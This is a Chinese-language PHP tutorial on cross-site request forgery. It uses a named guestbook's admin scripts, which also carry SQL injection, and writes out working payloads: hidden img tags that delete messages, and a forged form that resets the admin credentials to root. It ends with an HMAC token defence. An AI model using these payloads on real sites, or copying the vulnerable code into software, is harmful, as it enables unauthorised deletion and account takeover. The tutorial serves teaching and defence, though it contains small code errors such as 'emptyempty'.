今天我來給大家介紹在php中跨網站請求偽造的實現方法與最后我們些常用的防止偽造的具體操作方法,有需要了解的朋友可進入參考.
偽造跨站請求介紹
偽造跨站請求比較難以防范,而且危害巨大,攻擊者可以通過這種方式惡作劇,發spam信息,刪除數據等等,這種攻擊常見的表現形式有:
偽造鏈接,引誘用戶點擊,或是讓用戶在不知情的情況下訪問.
偽造表單,引誘用戶提交,表單可以是隱藏的,用圖片或鏈接的形式偽裝.
比較常見而且也很廉價的防范手段是在所有可能涉及用戶寫操作的表單中加入一個隨機且變換頻繁的字符串,然后在處理表單的時候對這個字符串進行檢查。這個隨機字符串如果和當前用戶身份相關聯的話,那么攻擊者偽造請求會比較麻煩.
如果攻擊者以隱藏的方式發送給目標用戶鏈接
<a src="/buy.php?item=watch&num=1000"/>,那么如果目標用戶不小心訪問以后,購買的數量就成了1000個.
實例,隨緣網絡PHP留言板V1.0,代碼如下,任意刪除留言:
- //delbook.php 此頁面用于刪除留言
- <?php
- include_once("dlyz.php"); //dlyz.php用戶驗證權限,當權限是admin的時候方可刪除留言
- include_once("../conn.php");
- $del=$_GET["del"];
- $id=$_GET["id"];
- if ($del=="data")
- {
- $ID_Dele= implode(",",$_POST['adid']);
- $sql="delete from book where id in (".$ID_Dele.")";
- mysql_query($sql);
- }
- else
- {
- $sql="delete from book where id=".$id; //傳遞要刪除的留言ID
- mysql_query($sql);
- }
- mysql_close($conn);
- echo "<script language='javascript'>";
- echo "alert('刪除成功!');";
- echo " location='book.php';";
- echo "</script>";
- ?>
當我們具有admin權限,提交http://localhost/manage/delbook.php?id=2 時,就會刪除id為2的留言.
利用方法,我們使用普通用戶留言,源代碼方式,內容為如下代碼:
- <img src="delbook.php?id=2" />
- <img src="delbook.php?id=3" />
- <img src="delbook.php?id=4" />
- <img src="delbook.php?id=5" />
插入4張圖片鏈接分別刪除4個id留言,然后我們返回首頁瀏覽看,沒有什么變化,圖片顯示不了,現在我們再用管理員賬號登陸后,來刷新首頁,會發現留言就剩一條,其他在圖片鏈接中指定的ID號的留言,全部都被刪除.
攻擊者在留言中插入隱藏的圖片鏈接,此鏈接具有刪除留言的作用,而攻擊者自己訪問這些圖片鏈接的時候,是不具有權限的,所以看不到任何效果,但是當管理員登陸后,查看此留言,就會執行隱藏的鏈接,而他的權限又是足夠大的,從而這些留言就被刪除了.
修改管理員密碼,代碼如下:
- //pass.php
- if($_GET["act"])
- {
- $username=$_POST["username"];
- $sh=$_POST["sh"];
- $gg=$_POST["gg"];
- $title=$_POST["title"];
- $copyright=$_POST["copyright"]."<br/>設計制作:<a href=http://m.survivalescaperooms.com>廈門隨緣網絡科技</a>";
- $password=md5($_POST["password"]);
- if(emptyempty($_POST["password"]))
- {
- $sql="update gly set username='".$username."',sh=".$sh.",gg='".$gg."',title='".$title."',copyright='".$copyright."' where id=1";
- }
- else
- {
- $sql="update gly set username='".$username."',password='".$password."',sh=".$sh.",gg='".$gg."',title='".$title."',copyright='".$copyright."' where id=1";
- }
- mysql_query($sql);
- mysql_close($conn);
- echo "<script language='javascript'>";
- echo "alert('修改成功!');";
- echo " location='pass.php';";
- echo "</script>";
- }
- 這個文件用于修改管理密碼和網站設置的一些信息,我們可以直接構造如下表單:
- <body>
- <form action="http://localhost/manage/pass.php?act=xg" method="post" name="form1" id="form1">
- <input type="radio" value="1" name="sh">
- <input type="radio" name="sh" checked value="0">
- <input type="text" name="username" value="root">
- <input type="password" name="password" value="root">
- <input type="text" name="title" value="隨緣網絡PHP留言板V1.0(帶審核功能)" >
- <textarea name="gg" rows="6" cols="80" >歡迎您安裝使用隨緣網絡PHP留言板V1.0(帶審核功能)!</textarea>
- <textarea name="copyright" rows="6" cols="80" >隨緣網絡PHP留言本V1.0 版權所有:廈門隨緣網絡科技 2005-2009<br/>承接網站建設及系統定制 提供優惠主機域名</textarea>
- </form>
- </body>
存為attack.html,放到自己網站上http://m.survivalescaperooms.com此頁面訪問后會自動向目標程序的pass.php提交參數,用戶名修改為root,密碼修改為root,然后我們去留言板發一條留言,隱藏這個鏈接,管理訪問以后,他的用戶名和密碼全部修改成了root.
防止偽造跨站請求
yahoo對付偽造跨站請求的辦法是在表單里加入一個叫.crumb的隨機串;而facebook也有類似的解決辦法,它的表單里常常會有post_form_id和fb_dtsg.
隨機串代碼實現,咱們按照這個思路,山寨一個crumb的實現,代碼如下:
- class Crumb {
- CONST SALT = "your-secret-salt";
- static $ttl = 7200;
- static public function challenge($data) {
- return hash_hmac('md5', $data, self::SALT);
- }
- static public function issueCrumb($uid, $action = -1) {
- $i = ceil(time() / self::$ttl);
- return substr(self::challenge($i . $action . $uid), -12, 10);
- }
- static public function verifyCrumb($uid, $crumb, $action = -1) {
- $i = ceil(time() / self::$ttl);
- if(substr(self::challenge($i . $action . $uid), -12, 10) == $crumb ||
- substr(self::challenge(($i - 1) . $action . $uid), -12, 10) == $crumb)
- return true;
- return false;
- }
- }
代碼中的$uid表示用戶唯一標識,而$ttl表示這個隨機串的有效時間.
應用示例,構造表單,在表單中插入一個隱藏的隨機串crumb,代碼如下:
- <form method="post" action="demo.php">
- <input type="hidden" name="crumb" value="<?php echo Crumb::issueCrumb($uid)?>">
- <input type="text" name="content">
- <input type="submit">
- </form>
處理表單 demo.php,對crumb進行檢查,代碼如下:
- <?php
- if(Crumb::verifyCrumb($uid, $_POST['crumb'])) {
- //按照正常流程處理表單
- } else {
- //crumb校驗失敗,錯誤提示流程
- }
- ?>
新聞熱點
疑難解答